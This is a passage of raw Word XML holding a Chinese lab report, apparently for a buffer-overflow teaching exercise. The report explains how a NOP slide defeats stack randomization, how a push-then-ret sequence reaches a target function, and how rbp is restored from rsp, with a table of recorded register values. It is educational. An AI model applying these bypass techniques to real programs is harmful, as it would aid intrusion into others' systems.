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ECB0" w14:textId="64F7A279" w:rsidR="00423056" w:rsidRDefault="00423056" w:rsidP="0004278A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关的栈进行了随机化处理</w:t>
      </w:r>
      <w:r w:rsidR="0004278A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B08629F" w14:textId="77777777" w:rsidR="00C76512" w:rsidRDefault="00C76512">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在网络中搜索常见的栈随机化绕过方法，从这篇博客</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DA9D7EE" w14:textId="77777777" w:rsidR="00C76512" w:rsidRDefault="00C76512">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>[</w:t>
      </w:r>
      <w:r w:rsidRPr="00C76512">
        <w:t>https://blog.csdn.net/a_18067/article/details/101914150</w:t>
      </w:r>
      <w:r>
        <w:t>]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22A6E7DA" w14:textId="4351301D" w:rsidR="00C76512" w:rsidRDefault="00C76512">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>中可以看到一种叫“</w:t>
      </w:r>
      <w:r w:rsidRPr="00C76512">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>NOP slide</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>”的方法。其原理是这样的，即使采取了栈随机化，但每次栈帧的起始地址</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:t>rsp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都会在一个小范围内波动，因此就可以在恶意字符串的开始插入大量的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指令，而真正的恶意代码在这些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指令之后才执行，然后让返回地址走到一个确定的、比较靠前的地址，从而只要返回地址命中任意一个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指令，最终都可以执行到目标指令，也就是我们编写的恶意代码。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EE5003C" w14:textId="164ADB08" w:rsidR="00C76512" w:rsidRDefault="00C76512">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>另一个问题在于，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>j</w:t>
      </w:r>
      <w:r>
        <w:t>mp</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的机器代码，是通过跳转的目标地址与当前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的差值来确定的，由于栈进行了随机化操作，在执行堆栈区的恶意代码时，每次的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都在变，而我们需要跳转到</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>t</w:t>
      </w:r>
      <w:r>
        <w:t>estn</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的目标地址没有变，因此用简单的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>j</w:t>
      </w:r>
      <w:r>
        <w:t>mp</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>是无法通过本关的。这里我们采取一个巧妙的办法，先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一下目标地址，然后再执行</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>r</w:t>
      </w:r>
      <w:r>
        <w:t>et</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>指令，就可以达到跳转目标。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5707B6E6" w14:textId="663CB9DF" w:rsidR="0004278A" w:rsidRDefault="004E55C0">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>另外，为了保持栈帧，每次都不能破坏</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>r</w:t>
      </w:r>
      <w:r>
        <w:t>bp</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>寄存器的值。</w:t>
      </w:r>
      <w:r w:rsidR="0004278A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>因此要将</w:t>
      </w:r>
      <w:r w:rsidR="0004278A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>r</w:t>
      </w:r>
      <w:r w:rsidR="0004278A">
        <w:t>bp</w:t>
      </w:r>
      <w:r w:rsidR="0004278A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>恢复到正常调用</w:t>
      </w:r>
      <w:r w:rsidR="0004278A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>g</w:t>
      </w:r>
      <w:r w:rsidR="0004278A">
        <w:t>etbufn</w:t>
      </w:r>
      <w:r w:rsidR="0004278A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>之后的值。</w:t>
      </w:r>
      <w:r w:rsidR="0004278A" w:rsidRPr="0004278A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>常识告诉我们，即使采取了栈随机化，每次调用过程时的</w:t>
      </w:r>
      <w:r w:rsidR="0004278A" w:rsidRPr="0004278A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>r</w:t>
      </w:r>
      <w:r w:rsidR="0004278A" w:rsidRPr="0004278A">
        <w:t>sp</w:t>
      </w:r>
      <w:r w:rsidR="0004278A" w:rsidRPr="0004278A">
        <w:t>都不同，</w:t>
      </w:r>
      <w:r w:rsidR="0004278A" w:rsidRPr="0004278A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>但是一个函数的栈帧大小应该是不变的，即</w:t>
      </w:r>
      <w:r w:rsidR="0004278A" w:rsidRPr="0004278A">
        <w:t>rsp</w:t>
      </w:r>
      <w:r w:rsidR="0004278A" w:rsidRPr="0004278A">
        <w:t>与</w:t>
      </w:r>
      <w:r w:rsidR="0004278A" w:rsidRPr="0004278A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>r</w:t>
      </w:r>
      <w:r w:rsidR="0004278A" w:rsidRPr="0004278A">
        <w:t>bp</w:t>
      </w:r>
      <w:r w:rsidR="0004278A" w:rsidRPr="0004278A">
        <w:t>的</w:t>
      </w:r>
      <w:r w:rsidR="0004278A" w:rsidRPr="0004278A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>差值应该是固定的</w:t>
      </w:r>
      <w:r w:rsidR="0004278A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。我们通过多次运行程序，记录每次调用完毕</w:t>
      </w:r>
      <w:r w:rsidR="0004278A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>g</w:t>
      </w:r>
      <w:r w:rsidR="0004278A">
        <w:t>etbufn</w:t>
      </w:r>
      <w:r w:rsidR="0004278A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>之后的</w:t>
      </w:r>
      <w:r w:rsidR="0004278A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>r</w:t>
      </w:r>
      <w:r w:rsidR="0004278A">
        <w:t>sp</w:t>
      </w:r>
      <w:r w:rsidR="0004278A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r w:rsidR="0004278A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>r</w:t>
      </w:r>
      <w:r w:rsidR="0004278A">
        <w:t>bp</w:t>
      </w:r>
      <w:r w:rsidR="0004278A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>值，得到如下一张表，可以发现</w:t>
      </w:r>
      <w:r w:rsidR="0004278A" w:rsidRPr="0004278A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>r</w:t>
      </w:r>
      <w:r w:rsidR="0004278A" w:rsidRPr="0004278A">
        <w:t>bp</w:t>
      </w:r>
      <w:r w:rsidR="0004278A" w:rsidRPr="0004278A">
        <w:t>与</w:t>
      </w:r>
      <w:r w:rsidR="0004278A" w:rsidRPr="0004278A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>r</w:t>
      </w:r>
      <w:r w:rsidR="0004278A" w:rsidRPr="0004278A">
        <w:t>sp</w:t>
      </w:r>
      <w:r w:rsidR="0004278A" w:rsidRPr="0004278A">
        <w:t>的差值是</w:t>
      </w:r>
      <w:r w:rsidR="0004278A" w:rsidRPr="0004278A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>一个固定值</w:t>
      </w:r>
      <w:r w:rsidR="00FF258A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>0</w:t>
      </w:r>
      <w:r w:rsidR="00FF258A">
        <w:t>x10</w:t>
      </w:r>
      <w:r w:rsidR="00FF258A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136"/>
        <w:gridCol w:w="2136"/>
        <w:gridCol w:w="2017"/>
      </w:tblGrid>
      <w:tr w:rsidR="00420065" w:rsidRPr="00420065" w14:paraId="246C3C1B" w14:textId="77777777" w:rsidTr="00C83DDF">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2074" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="16546DF8" w14:textId="77777777" w:rsidR="00420065" w:rsidRPr="00420065" w:rsidRDefault="00420065" w:rsidP="00420065">
            <w:r w:rsidRPr="00420065"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400B882E" w14:textId="77777777" w:rsidR="00420065" w:rsidRPr="00420065" w:rsidRDefault="00420065" w:rsidP="00420065">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00420065">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>rsp</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2074" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="15741252" w14:textId="77777777" w:rsidR="00420065" w:rsidRPr="00420065" w:rsidRDefault="00420065" w:rsidP="00420065">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00420065">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>rbp</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2074" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="20EFA3D1" w14:textId="77777777" w:rsidR="00420065" w:rsidRPr="00420065" w:rsidRDefault="00420065" w:rsidP="00420065">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00420065">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>rbp-rsp</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00420065" w:rsidRPr="00420065" w14:paraId="255478BC" w14:textId="77777777" w:rsidTr="00C83DDF">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2074" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="674A8D9B" w14:textId="77777777" w:rsidR="00420065" w:rsidRPr="00420065" w:rsidRDefault="00420065" w:rsidP="00420065">
            <w:r w:rsidRPr="0042006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2275D2F" w14:textId="58B889C0" w:rsidR="00420065" w:rsidRPr="00420065" w:rsidRDefault="00420065" w:rsidP="00420065">
            <w:r w:rsidRPr="00420065">
              <w:t>00000000556839e0</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2074" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2B2EA0CD" w14:textId="08795DA2" w:rsidR="00420065" w:rsidRPr="00420065" w:rsidRDefault="00420065" w:rsidP="00420065">
            <w:r w:rsidRPr="00420065">
              <w:t>00000000556839f0</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2074" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="36DBB250" w14:textId="71D407D4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</w:t>
            </w:r>
            <w:r>
              <w:t>1</w:t>
            </w:r>
            <w:r w:rsidRPr="00420065">
              <w:t>0</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00420065" w:rsidRPr="00420065" w14:paraId="6BB8720E" w14:textId="77777777" w:rsidTr="00C83DDF">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2074" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="34A89DB0" w14:textId="77777777" w:rsidR="00420065" w:rsidRPr="00420065" w:rsidRDefault="00420065" w:rsidP="00420065">
            <w:r w:rsidRPr="00420065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3B6372A" w14:textId="1D1A16E9" w:rsidR="00420065" w:rsidRPr="00420065" w:rsidRDefault="00420065" w:rsidP="00420065">
            <w:r w:rsidRPr="00420065">
              <w:t>0000000055683970</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2074" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="406F1203" w14:textId="0D84A250" w:rsidR="00420065" w:rsidRPr="00420065" w:rsidRDefault="00420065" w:rsidP="00420065">
            <w:r w:rsidRPr="00420065">
              <w:t>0000000055683980</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2074" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0012C912" w14:textId="687B02FF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3AD1EDF7" w14:textId="77777777" w:rsidTr="00C83DDF">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2074" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1DFC7DF9" w14:textId="77777777" w:rsidR="00420065" w:rsidRPr="00420065" w:rsidRDefault="00420065" w:rsidP="00420065">
            <w:r w:rsidRPr="00420065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A797685" w14:textId="5FAA6249" w:rsidR="00420065" w:rsidRPr="00420065" w:rsidRDefault="00420065" w:rsidP="00420065">
            <w:r w:rsidRPr="00420065">
              <w:t>00000000556839d0</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2074" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="20C4CDF2" w14:textId="5AFF565B" w:rsidR="00420065" w:rsidRPr="00420065" w:rsidRDefault="00420065" w:rsidP="00420065">
            <w:r w:rsidRPr="00420065">
              <w:t>00000000556839e0</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2074" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="391D79AF" w14:textId="5C591670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5D055550" w14:textId="77777777" w:rsidTr="00C83DDF">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2074" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="22A2E9D5" w14:textId="77777777" w:rsidR="00420065" w:rsidRPr="00420065" w:rsidRDefault="00420065" w:rsidP="00420065">
            <w:r w:rsidRPr="00420065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EF166B2" w14:textId="2DD5D3BD" w:rsidR="00420065" w:rsidRPr="00420065" w:rsidRDefault="00420065" w:rsidP="00420065">
            <w:r w:rsidRPr="00420065">
              <w:t>0000000055683960</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2074" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6DFD9E17" w14:textId="10A46ED6" w:rsidR="00420065" w:rsidRPr="00420065" w:rsidRDefault="00420065" w:rsidP="00420065">
            <w:r w:rsidRPr="00420065">
              <w:t>0000000055683970</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2074" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="35A6D9FB" w14:textId="372AE253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22B426F6" w14:textId="77777777" w:rsidTr="00C83DDF">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2074" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="30A6C3D1" w14:textId="77777777" w:rsidR="00420065" w:rsidRPr="00420065" w:rsidRDefault="00420065" w:rsidP="00420065">
            <w:r w:rsidRPr="00420065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8B2F608" w14:textId="73EB4A96" w:rsidR="00420065" w:rsidRPr="00420065" w:rsidRDefault="00420065" w:rsidP="00420065">
            <w:r w:rsidRPr="00420065">
              <w:t>00000000556839d0</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2074" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="549540DC" w14:textId="6528FE8D" w:rsidR="00420065" w:rsidRPr="00420065" w:rsidRDefault="00420065" w:rsidP="00420065">
            <w:r w:rsidRPr="00420065">
              <w:t>00000000556839</w:t>
            </w:r>
            <w:r>
              <w:t>e</w:t>
            </w:r>
            <w:r w:rsidRPr="00420065">
              <w:t>0</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2074" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7CE61B59" w14:textId="7C75423E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5F39AA73" w14:textId="77777777" w:rsidTr="00C83DDF">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2074" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="74476822" w14:textId="77777777" w:rsidR="00420065" w:rsidRPr="00420065" w:rsidRDefault="00420065" w:rsidP="00420065">
            <w:r w:rsidRPr="00420065"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272C61A" w14:textId="52EA5E68" w:rsidR="00420065" w:rsidRPr="00420065" w:rsidRDefault="00420065" w:rsidP="00420065">
            <w:r w:rsidRPr="00420065">
              <w:t>00000000556839e0</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2074" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3826C70F" w14:textId="6C78B265" w:rsidR="00420065" w:rsidRPr="00420065" w:rsidRDefault="00420065" w:rsidP="00420065">
            <w:r w:rsidRPr="00420065">
              <w:t>00000000556839f0</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2074" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="42AF6EC7" w14:textId="4FA8F648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123B0919" w14:textId="77777777" w:rsidTr="00C83DDF">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2074" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="424CD5AB" w14:textId="77777777" w:rsidR="00420065" w:rsidRPr="00420065" w:rsidRDefault="00420065" w:rsidP="00420065">
            <w:r w:rsidRPr="00420065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18ADDD6F" w14:textId="3C127A8C" w:rsidR="00420065" w:rsidRPr="00420065" w:rsidRDefault="00420065" w:rsidP="00420065">
            <w:r w:rsidRPr="00420065">
              <w:t>0000000055683970</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2074" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6114BCC5" w14:textId="01308269" w:rsidR="00420065" w:rsidRPr="00420065" w:rsidRDefault="00420065" w:rsidP="00420065">
            <w:r w:rsidRPr="00420065">
              <w:t>0000000055683980</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2074" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="739ABC69" w14:textId="2F12EF73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38418B5F" w14:textId="77777777" w:rsidTr="00C83DDF">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2074" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7DD8CEC8" w14:textId="77777777" w:rsidR="00420065" w:rsidRPr="00420065" w:rsidRDefault="00420065" w:rsidP="00420065">
            <w:r w:rsidRPr="00420065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0181D289" w14:textId="04CC5A6D" w:rsidR="00420065" w:rsidRPr="00420065" w:rsidRDefault="00420065" w:rsidP="00420065">
            <w:r w:rsidRPr="00420065">
              <w:t>00000000556839d0</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2074" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6C767941" w14:textId="5053EBFC" w:rsidR="00420065" w:rsidRPr="00420065" w:rsidRDefault="00420065" w:rsidP="00420065">
            <w:r w:rsidRPr="00420065">
              <w:t>00000000556839e0</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2074" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1816A841" w14:textId="0D0FFC83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2CFFB878" w14:textId="77777777" w:rsidTr="00C83DDF">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2074" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="458C9979" w14:textId="77777777" w:rsidR="00420065" w:rsidRPr="00420065" w:rsidRDefault="00420065" w:rsidP="00420065">
            <w:r w:rsidRPr="00420065"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DE88841" w14:textId="118BBDB9" w:rsidR="00420065" w:rsidRPr="00420065" w:rsidRDefault="00420065" w:rsidP="00420065">
            <w:r w:rsidRPr="00420065">
              <w:t>0000000055683960</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2074" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1CC00287" w14:textId="797E6B4B" w:rsidR="00420065" w:rsidRPr="00420065" w:rsidRDefault="00420065" w:rsidP="00420065">
            <w:r w:rsidRPr="00420065">
              <w:t>0000000055683970</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2074" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0D2DB183" w14:textId="61F4ED77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  <w:tr w:rsidR="00420065" w:rsidRPr="00420065" w14:paraId="490A7FA4" w14:textId="77777777" w:rsidTr="00C83DDF">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2074" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6954B12D" w14:textId="77777777" w:rsidR="00420065" w:rsidRPr="00420065" w:rsidRDefault="00420065" w:rsidP="00420065">
            <w:r w:rsidRPr="00420065">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
            <w:r w:rsidRPr="00420065">
              <w:t>0</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2074" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="711E0687" w14:textId="5CCBAD59" w:rsidR="00420065" w:rsidRPr="00420065" w:rsidRDefault="00420065" w:rsidP="00420065">
            <w:r w:rsidRPr="00420065">
              <w:t>00000000556839d0</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2074" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="27ED5A90" w14:textId="6D69BDCA" w:rsidR="00420065" w:rsidRPr="00420065" w:rsidRDefault="00420065" w:rsidP="00420065">
            <w:r w:rsidRPr="00420065">
              <w:t>00000000556839e0</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2074" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="57B800FB" w14:textId="6FFBCA6D" w:rsidR="00420065" w:rsidRPr="00420065" w:rsidRDefault="00420065" w:rsidP="00420065">
            <w:r w:rsidRPr="00420065">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>0</w:t>
            </w:r>
            <w:r w:rsidRPr="00420065">
              <w:t>x10</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="51F4E4E8" w14:textId="77777777" w:rsidR="0004278A" w:rsidRDefault="0004278A"/>
    <w:p w14:paraId="1A13E9C7" w14:textId="346E8F26" w:rsidR="0004278A" w:rsidRPr="0004278A" w:rsidRDefault="004E55C0" w:rsidP="0004278A">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>由于</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>r</w:t>
      </w:r>
      <w:r>
        <w:t>bp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sp</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的差值是一个固定值</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>这里是</w:t>
      </w:r>
      <w:r w:rsidR="00FF258A">
        <w:t>0x10</w:t>
      </w:r>
      <w:r>
        <w:t>)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，因此每次可以利用当前</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>r</w:t>
      </w:r>
      <w:r>
        <w:t>sp</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的值加上</w:t>
      </w:r>
      <w:r w:rsidR="00FF258A">
        <w:t>0x10</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>再传给</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>r</w:t>
      </w:r>
      <w:r>
        <w:t>bp</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，达到恢复</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>r</w:t>
      </w:r>
      <w:r>
        <w:t>bp</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的效果。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08FC3E67" w14:textId="4E54E56C" w:rsidR="0004278A" w:rsidRPr="0004278A" w:rsidRDefault="00FF258A" w:rsidP="0004278A">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="29F24A8F" wp14:editId="1A8C7264">
            <wp:extent cx="5274310" cy="1044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1B41" w14:textId="77777777" w:rsidR="0004278A" w:rsidRPr="0004278A" w:rsidRDefault="0004278A" w:rsidP="0004278A">
      <w:r w:rsidRPr="0004278A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>常识告诉我们，即使采取了栈随机化，每次调用过程时的</w:t>
      </w:r>
      <w:r w:rsidRPr="0004278A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>r</w:t>
      </w:r>
      <w:r w:rsidRPr="0004278A">
        <w:t>sp</w:t>
      </w:r>
      <w:r w:rsidRPr="0004278A">
        <w:t>都不同，</w:t>
      </w:r>
      <w:r w:rsidRPr="0004278A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>但是一个函数的栈帧大小应该是不变的，即</w:t>
      </w:r>
      <w:r w:rsidRPr="0004278A">
        <w:t>rsp</w:t>
      </w:r>
      <w:r w:rsidRPr="0004278A">
        <w:t>与</w:t>
      </w:r>
      <w:r w:rsidRPr="0004278A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>r</w:t>
      </w:r>
      <w:r w:rsidRPr="0004278A">
        <w:t>bp</w:t>
      </w:r>
      <w:r w:rsidRPr="0004278A">
        <w:t>的</w:t>
      </w:r>
      <w:r w:rsidRPr="0004278A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>差值应该是固定的，通过上面的表格也可以印证这一点。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="073AD353" w14:textId="77777777" w:rsidR="0004278A" w:rsidRPr="0004278A" w:rsidRDefault="0004278A"/>
